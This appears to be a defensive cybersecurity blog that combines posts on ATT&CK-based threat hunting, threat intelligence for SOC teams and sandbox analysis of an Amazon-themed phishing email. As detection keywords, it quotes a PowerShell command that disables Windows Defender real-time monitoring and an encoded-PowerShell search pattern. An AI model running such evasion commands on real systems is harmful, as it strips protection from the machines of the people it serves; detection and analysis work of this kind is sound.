CyberTechventures

MITRE ATT&CK Framework is one of the most popular methodologies in cybersecurity in the past few years. Cybersecurity tools come integrated with it, cybersecurity leaders talk about it and expect their teams to know and leverage it in their day-to-day operations. Cybersecurity is an ever-changing field where threat actors are coming up with new strategies and techniques every single day to bypass security defenses and achieve their objectives. Attacker tradecrafts are widely reported and researched upon by various news agencies, threat intelligence teams and independent researchers around the world. For any cyber-defender, this "body of work" is a vast database which they can leverage to strengthen their operations. This threat research data combined with an actionable knowledge of MITRE ATT&CK Framework can take their SOC operations to the next level. The objective of this write-up is to help them achieve this objective by introducing the relevant concepts and explaining the process in a step-by-step manner.

Part 1: Attack Data Collection

As a SOC Analyst or Blue Team member, one of the most valuable information to have is the real-world attack data, including the various attack types, the extent and impact of these attacks. What are some effective ways to collect this critical data?

• Cybersecurity News Websites: The Hacker News, Bleeping Computer, Cyber Security News, Cyware etc. are leading websites for collecting cyberattack and vulnerability data. The advantage with these websites is that they never miss the major attacks and will be the firsts to report them. Apart from that, they summarize the attack data into simple, easy-to-understand language which is suited for cybersecurity beginners and experienced alike. But one thing to note is that, these websites are majorly cybersecurity news-reporting websites. In their articles, you'll also find links towards the original research(performed by other companies or individuals), so make sure not to miss the original research articles as well, in order to develop a deeper understanding of an attack or vulnerability.

  
  

• RSS Feeds: Going to each and every news website and gathering information might become a strenuous and time-consuming process and this is where the RSS Feeds will come handy. RSS Feed is a web feed format which helps to subscribe to websites and receive new content from them without having to constantly visit those websites. Feedly is a very helpful RSS Feed app. The advantage here is that you get all the major cybernews and updates from your favourite websites in one place.

  
  

• Newsletters: Cybersecurity Newsletters are a great way to collect the latest attack data without putting too much effort to gather the info. My personal favourite in this area is SANS NewsBites newsletter. It's a semi-weekly(twice a week) newsletter(comes straight to your inbox if subscribed!) which covers the major cyberattacks and vulnerabilities for the week. The best part is, it's concise and to-the-point, contains commentaries about the news piece from SANS experts(which helps understand the historical context and importance of the news) and provides links from cybersecurity news websites for additional research.

  
  

• Cyber-news Podcasts: Cyber-news podcasts are a great way to constantly be updated about the latest news. Podcasts provide a unique advantage that they can be added in along with your routine tasks, be it morning/evening walks, cooking or driving. SANS Stormcast is one the best cybernews podcasts out there. Rather than just news reporting, there are lots of insights, recommendations and discussions included in this one. At the same time, it's short and precise. CISO Series Cyber Security Headlines is another good option to gather the latest attack information.

Part 2: MITRE ATT&CK Framework

MITRE ATT&CK Framework is one of the most comprehensive and directly actionable frameworks we have within the Cybersecurity domain. ATT&CK Framework consists of 14 Tactics, and each Tactic has multiple Techniques and Sub-Techniques. 

In Simple terms,

• Tactics be compared to different stages in the Cyber Kill Chain. These are basically the goals or objectives of the attackers. Examples of Tactics are Initial Access, Lateral Movement, Exfiltration etc.

• Techniques are how that goal or objective can be achieved by the attacker, eg. Initial Access into a target environment can be achieved through Spearphishing, Bruteforce etc.

• Then there are Procedures, which are real-world instances(cyberattacks) where specific techniques have been used by threat actors to compromise environments. Procedures are one of the most overlooked components within ATT&CK Framework. A detailed study of procedures will help Blue Team and Red Team members understand real-world attacks in-depth.

  
  

Each Technique page within MITRE ATT&CK website contains detailed Detection and Mitigation steps which is invaluable data to the Blue Team. Detection ideas mentioned in ATT&CK page can be used in combination with the analytics rules detailed in MITRE CAR website(Another wonderful initiative from MITRE) to develop detection rules for your SIEM tool. A major point worth noting is, most of the high-profile attacks are not limited to just 1 or 2 tactics/techniques but are a combination of various tactics and techniques. This might even extend, in certain cases, to all the 14 tactics in the ATT&CK Framework. No matter how sophisticated the adversary is, this framework provides cybersecurity teams with a logical pathway to investigate and uncover the trajectory of the attacker.

Part 3: Extract Relevant Threat Intel from Real Attack Data

In the previous two sections, we discussed the collection of real attack data and the concepts of MITRE ATT&CK Framework. But as obvious as it is, no cyberattack news or frameworks are useful unless we can derive actionable intel from them in order to protect corporate environments. Let us explore some effective ways to extract relevant threat intel from real attack data.

• Cyberattack News -"Reading between the lines": We've already discussed how to collect important Cybersecurity news and attack-related data. Now, while reading such news articles(especially from news-reporting websites like The Hacker News, Bleeping Computer etc.), it's important to not just do peripheral reading but try to go deep and understand the attacker's killchain stages, tactics, techniques and attacker path.

  
  

• In-Depth Threat Research Reference: There are different threat intel teams disseminating in-depth threat research information regularly.

  Some of the ones which shouldn't be missed are:

  1. CISA Threat Advisories

  2. Palo Alto Unit 42 Threat Research

  3. Mandiant(Now part of Google Cloud) Threat Research

  4. Red Canary blogs

  5. Microsoft Threat Research

     
     

     1. Collecting IOCs

     The above-mentioned threat research blogs provide attacker IOCs, i.e the IP addresses/Domains/ URLs/Files(hashes) currently in use or has been historically used by threat actors to compromise company environments. Make a note of this valuable information.

     
     

     2. Collecting TTPs

     MITRE TTPs go even deeper than IOCs and track the modus operandi of the attackers. The above-mentioned threat research blogs provide detailed tactics and techniques used by the attackers. Make short notes of the attacker TTPs including tools used, commands run etc.

     
     

     3. Prevention/Mitigation Recommendations

     These threat research articles also provide detailed attack prevention and mitigation recommendations which can be helpful in fortifying your defenses against specific attacks as well as improving your overall security posture.

Part 4: Unleash the Power of Collected Threat Intel with Proactive Threat Hunting

In parts 1 to 3, we explored how to collect real attack data, relevance of MITRE ATT&CK framework and extracting relevant threat intel from the collected attack data. Now, it's time to leverage the collected threat intel to actively hunt the adversaries in your environment. Let's look into some effective ways to perform proactive threat hunting.

• Threat Hunting with IOCs: The IP addresses, domains, URLs, file hashes etc. of the malicious actor can be searched in your SIEM tool using the format <field="value">. If the IOC list is long, can be created as watchlists/reference lists and searched accordingly. If there are results for IOCs in the logs, need to take appropriate actions such as blocking IPs, file hashes as well as analyzing further malicious activities connected to those IOCs.

• Threat Hunting with "Keywords": Searching with keywords can be a good starting point for TTP hunting. There are certain tools, commands and other attack patterns commonly seen under attacker tactics. For eg. Encoded PowerShell is a common technique used by threat actors to achieve Defense Evasion. Searching with keywords powershell.exe -enc as a regex in raw logs will be helpful to determine encoded PowerShell commands(In Google SecOps, "Legacy Search" can be used for the same). Threat hunting with keywords also helps identify the field-value pairs which will be helpful in the next step.

• Developing Threat Hunting Rules: Once keywords are searched upon and field-value pairs identified, threat hunting rules can be developed to further finetune the process. For eg., in Google SecOps, encoded PowerShell commands can be searched using the query:

  principal.process.file.full_path = /powershell.exe$/ AND principal.process.command_line =/powershell.exe -enc/

  
  

  Additional conditions can be added to filter for just malicious encoded PowerShell commands by analyzing the base64 strings. Threat hunting rules can also be made repeatable by saving them as "Saved Searches"(Google SecOps).

• "Automate it"-Feedback Loop to Detection Rules: The best part about threat hunting is, it leads us to findings which creates a feedback loop to Detection Rules. Once something malicious has been uncovered during threat hunting, the relevant teams need to be immediately informed to take corrective actions. The next logical step is to automate the findings using Detection Rules so that the malicious actor's movements are alerted in future even when the threat hunting for the actor is not active at that point of time.

If threat actors are refining their TTPs with each passing day, we as defenders need to be one step ahead and be able to track them down and defeat their purpose. With the pattern they follow and the evidence they leave behind, in a way, they are helping us develop our knowledge base which will in-turn be used against them. The practices mentioned in this article are intended to help you in your fight against their might!

Security Operations Center(SOC) is one of the most crucial components in Cyberdefense for any new-age enterprises. No matter how many costly and popular cybersecurity tools have been purchased by companies, there's not much worth if there are no efforts towards centralized log collection and a SOC Team which can draw understanding from, and take actionable steps from the vast pool of collected logs from various log sources. But a question arises; can a SOC achieve it’s true potential without being updated on the latest cyberattacks and vulnerabilities?

Consider a situation where a SOC Team member is going through the logs from a particular log source and is coming across an attack pattern, for eg. multiple login failures from different geolocations seen in firewall logs. Seems to be a dictionary bruteforce attack on the firewall management interface. Also consider that subsequently, they're also going through a threat intelligence article which details an attack camapign which targets their firewall vendor's management interface via a critical vulnerability. The article also contains the malicious iocs and other details of the attackers, the details of the vulnerability which is targeted, the patch details for the vulnerability, and actionable steps to prevent a major incident in future. The SOC Team member is alarmed by the critical exposure of the firewall management interface to public and works closely with Firewall Team to limit public access via a VPN. They also make sure firewall has the latest patches. Additionally, they perform threat hunt for the malicious IoCs and block if any found within the company environment. They also create rules and dashboards to automate these detections in the future. This is where the power of Threat Intelligence comes in. While earlier it was just a bruteforce attack detected on firewall logs, with added threat intel coverage, its context expanded above and beyond and gave lots of actionable steps to the SOC Team to secure their enterprise.

What Really is Threat Intelligence?

So before going further, lets have some basic understanding about threat intelligence and its usecases.

In simple terms, threat intelligence is the art of knowing who your attackers or potential attackers are, and predicting their next move. Threat intelligence comes in various forms such as Tactical Threat Intelligence, Operational Threat Intelligence and Strategic Threat Intelligence. From a SOC perspective, more relevant are the former two, i.e Tactical(IoC-based) and Operational(TTP-based) Threat Intelligence. Since tactical threat intelligence is IoC-based(Indicators of Compromise), its more volatile. IPs, domains, file hashes etc. will keep on changing as the threat actor can easily do so in order to cover their tracks. So having the relevant and up-to-date information is very important in tactical threat intelligence. Nowadays, what many SOC teams are doing wrong is, overly relying on third-party TI feeds integration and thinking that that's enough to tick the TI box. The problem with this approach is that, many of the feeds ingested or iocs received might not be relevant to you and will only help to increase the overall log ingestion into your SIEM tool. It could be outdated data, for eg. a "malicious" IP which is 3 months old and which is no longer used by the attacker, or a domain which targets an entirely different country or industry from yours. These are irrelevant data for your organization. Operational Threat Intelligence relies on attacker TTPs(Tactics, Techniques & Procedures) which has more lifespan compared to IOCs. This is because TTPs are basically attacker behaviours which doesn’t change overnight. For eg. A threat actor using a specific phishing lure for initial access, using a specific C2 protocol for data exfiltration etc. The best practice for SOC teams is to use a combination of tactical and operational threat intelligence for maximum effectiveness.

Relevant Threat Intel

Threat Intelligence in its true form is always relevant and that's particularly so when some of the below conditions are met:

- Relevant to your industry: For eg. A specific rasomware targeting healthcare industry.

- Relevant to your region: Cybercrimes trageting your company's operational region.

- Technology-specific threats: Critical Vulnerabilities present or attacks targeting your technology stack, be it the operating system used, Windows or third-party applications deployed etc.

How to gather Threat Intelligence

The best thing to have is your own threat intelligence team which actively researches the open, deep and dark web for gathering data on critical threats. If your company doesn’t have that bandwidth, lots of proactive threat intel teams are present across the world which disseminate critical threat research data for free on a periodic basis. Some of the best threat intel teams in the industry are:

• Palo Alto Unit 42

• Mandiant(Now part of Google Cloud) Threat Research

• Google Project Zero

• Microsoft Threat Research

• Red Canary

• Elastic Labs

• Talos Intelligence

Each of these vendors are leaders in threat research and their articles go so much in-depth into the vulnerabilities, how they’re exploited, related iocs etc. If mapped rightly to the parameters for relevant threat intel which was discussed previously, these info can provide invaluable inputs to companies to improve their overall security posture.

How to Leverage Threat Intelligence in SOC Monitoring?

Even though threat intelligence is one of the most powerful assets for any blue team, its one of the most underutilized powers in many companies. Even to the extent that many cybersecurity companies simply see it as a marketing exercise which is limited to sending Weekly Threat Intel Newsletters to their existing/prospective clients. But here's a fundamental thought which might help reiterate the importance of threat intel. If not well-informed about the latest cyberattacks or vulnerabilities, how efficient will defenders be? Is the purpose of SOC just to check the compliance boxes and get drowned in redundant false positive alerts? If the answer is a big NO, let’s discuss some ways to effectively leverage the valuable information extracted from threat intelligence to empower the SOC operations.

Threat Hunting with IOCs

The easiest and the best way to start leveraging threat intelligence is performing a threat hunt with the IOCs collected from the threat intel. This is the tactical threat intel area which we previously discussed. In this stage, we check whether there were any connection attempts(allowed/blocked) from the malicious IPs  towards our company environment, any malicious hashes(files) observed in the endpoint logs, malicious domain connections observed from any of the endpoints etc. If allowed connections are observed, further investigation is required including checking the bytes transferred, any return connections, file executions, file drops in unusual locations, further inbound/outbound connections targeting vulnerable ports etc. Remediation actions can start with blocking the malicious iocs and then taking further steps as required according to how the investigation unfolds.

Threat hunting focused on TTPs

Here, we leverage the Operational Threat Intelligence which was discussed earlier wherein we focus on the attacker's tactics, techniques and procedures(TTPs).

Consider a threat actor who uses a specific phishing lure, i.e Christmas themed giveaway emails(Initial Access). The email contains a Word file attachment which when opened  contains Macros which need to be enabled to view content. Upon enabling macros, a powershell script gets downloaded and run. The PowerShell script checks user privileges(Discovery), disables the real-time protection in Windows Defender(Defense Evasion), attempts to download and install the WinSCP software(Execution), compresses and sends data to a remote server using WinSCP(Data Exfiltration). Many of these tactics/techniques are common across threat actors and can be spotted using threat hunting rules which contains command-line keywords from these activities.

For eg., disabling real time monitoring is performed using the following command in PowerShell:

Set-MpPreference -DisableRealtimeMonitoring $true

Such attempts can be spotted by searching for commandlines in Sysmon/EDR logs with the keyword "DisableRealtimeMonitoring"

Very obviously, such activity might overlap with valid admin activity which is why hunting and log analysis shouldn’t be limited to just a few commandlines or IP connections, but the search time should be broadened to analyse what happened before and after the suspicious activity. If it’s a case of compromised admin account, most probably you’ll see something unexpected/absurd happening unlike a normal admin account.

Detection Rules

Now consider we have performed the threat hunting based on relevant threat intel for our company and made sure that there's no imminent threat targeting our firm. But what if, something happens later when we're not performing hunting? What if the SOC Team has shifted its focus to another major threat actor which is targeting its geographical area and the previous threat actor takes advantage of this opportunity? So we need a means to automate the process of getting alerted when it matters, i.e we need Detection Rules. Detection rules can also be IoC-based or TTP-based. IoC-based rules might be helpful to detect a specific threat-actor presence in company environments but are often short-lived. TTP-based rules can prove helpful to detect different threat actors since as discussed earlier, many TA's share similar tactics/techniques.

Dashboards

Building dashboards to monitor attack trends is another helpful way to evaluate the overall security posture of your firm. Dashboards provide a bird's eye-view into those key metrics which helps both the SOC Team and the C-Level Executive Team alike. SOC Team gains visibility into critical vulnerabilities and threats looming over their enterprise, which can be further investigated in-depth via log analysis and threat hunting as well as can be automated using detection rules. CISO can take major strategic decisions based on the visible company exposure and by identifying areas which require higher cybersecurity investment.

Its high time to make a major shift from viewing threat intelligence as a fashionable, marketing term which is seldom used realistically in cyberdefense to being an essential powerhouse of a SOC Team. Relevant and actionable threat intel coupled with well-devised SOC processes will be a real force to be reckoned with! Its time to de-glamorize and expose the cybercrime space which is filled with crooks who rejoice on others’ miseries and thinks they can get away with it. Threat-intel powered SOC shows the way forward!!

In Parts 1 and 2, we covered two areas within static analysis of a phishing mail. In this final part, we're moving on to Dynamic Analysis, where we execute and interact with the malware embedded in malicious mails.

What is Email Dynamic Analysis?

Dynamic analysis of phishing mails is used to examine and understand the behavior of phishing emails in real-time. Dynamic analysis involves studying the behavior of an email when it is opened or interacted with, as opposed to static analysis, which examines the email's content and code without executing it.

Here are some key aspects of phishing email dynamic analysis:

Behavior Monitoring

Analysts observe the behavior of the email when opened or interacted with, including any attempts to connect to external servers, download malicious content, or execute malicious scripts.

Sandboxing

Phishing emails are often analyzed in a controlled environment known as a sandbox. Sandboxing involves running the email in an isolated environment to monitor its actions without risking harm to the actual system.

Code Execution Analysis

Analysts examine any scripts or code embedded in the email to understand their purpose and potential malicious activities. This includes looking for attempts to exploit vulnerabilities or execute malicious commands.

Payload Analysis

If the email contains attachments, dynamic analysis involves examining the payload (e.g., malicious files, documents, or executables) to understand their functionality and potential impact on the system.

Dynamic URL Analysis

If the email includes hyperlinks, dynamic analysis involves checking the behavior of these URLs when clicked, including redirection to malicious sites or attempts to download malicious content.

Malware Detection

Dynamic analysis helps identify and detect any malware associated with the phishing email. This can include traditional malware or more sophisticated types such as ransomware.

Dynamic Analysis Tools

Let’s explore some effective tools which can be utilized to perform dynamic analysis on phishing mails.

Virtual Machines

Virtual machines hosted in personal devices are one of the preferred ways for analyzing malware. You can use the virtualization vendor of your choice(Eg. VirtualBox, VMware etc.). For OS, its suggested to have Linux as the host OS and Windows as the guest OS. Most malware targets Windows, so it’s the best choice for guest OS for successfully simulating malware infection. Also, since the host OS is Linux, the malware will be ineffective even if it escapes the guest OS into the host.

ANY.RUN

ANY.RUN is one of the leading online malware sandbox solutions in the market. The advantage of Any.Run is that it is fully interactive, i.e suppose an excel file needs to be uploaded and then macros needs to be enabled within the file to activate malware, all that could be performed safely within Any.Run’s online Virtual machine. Also, there are lots of customization options for the online VM such as OS version, browser, network etc. Free version has some limitations such as a time limit of 1 min with extra added time of max. 4 mins, availability of public task only(which means all browsed data will be public), only available OS-Windows 7 to name a few. 

SquareX

SquareX is a revolutionary cybersecurity tool with multiple features such as disposable browser, disposable file viewer and disposable email. Using SquareX is as simple as opening a new tab in your browser. SquareX just requires you to open their browser extension or web app, spin up their disposable browser or file viewer and then start analyzing the malicious URL or attachment which you’re after. Each session lasts for 10 mins, can be extended for additional 10 mins for any number of times.

Browserling

Browserling is an online cross-browser testing tool which can be used as a URL sandbox. Enter the suspicious URL which needs to be analyzed, select the OS, browser and browser versions of your choice and proceed. Free version is limited to Windows 10 OS, 3 min. time limit etc. to name a few.

Sample Analysis

Now, lets perform a sample analysis on a malicious mail with one of the dynamic analysis tools which we discussed above.

The email pretends to come from Amazon support and mentions that an “imaginary” card associated with mail recipient’s Prime membership is no longer valid and that the card details needs to be updated. The email uses urgency tactic by stressing that the updation should be done within 1 day. The email further directs the recipient to open the email attachment for details.

We’ve downloaded the .docx attachment to a VM and for further protection, we’re using Any.Run sandbox for opening the attachment and viewing details.

The document contains similar information as seen in the email body. 2 URLs have been included for updating the (“imaginary”) card details. When we hover over both the links, its clear that both are the same and they direct to “qrco[.]de/beGfog” which is a QR Code Generator website. We click on the link and it opens in a browser within Any.Run sandbox.

The webpage mentions that  “The QR Code Campaign has been disabled for some reason”. This indicates that this webpage had previously hosted a QR code which, when scanned might have taken the victim to the attacker-controlled website setup to steal victim’s credentials. Later, the malicious website might have got taken down by law enforcement or deleted by the attacker themselves due to which the QR code has got disabled.

Finally, we’ve successfully completed the various ways of analyzing phishing mails. The evolution of phishing has taken a concerning turn with the incorporation of AI, enabling attackers to create more convincing and adaptive phishing campaigns. Highly-sophisticated phishing, despite its complexity, has become easily accessible due to the widespread availability of phishing kits and phishing-as-a-service options available in the dark web, facilitating cybercriminals in orchestrating attacks with minimal technical expertise. But the fact is that however sophisticated a phishing attempt is, there’ll still be some loopholes which helps uncover the threat as in the case of any criminal act. It is imperative for cybersecurity professionals to master diverse methods of analyzing phishing mails rather than solely relying on grammatical errors or hovering over links. Such knowledge will empower even a common end user of the internet to make informed decisions on the basis of rightly identifying phishing threats without seeking external assistance.

For any concerns or queries, hit me up on LinkedIn or Twitter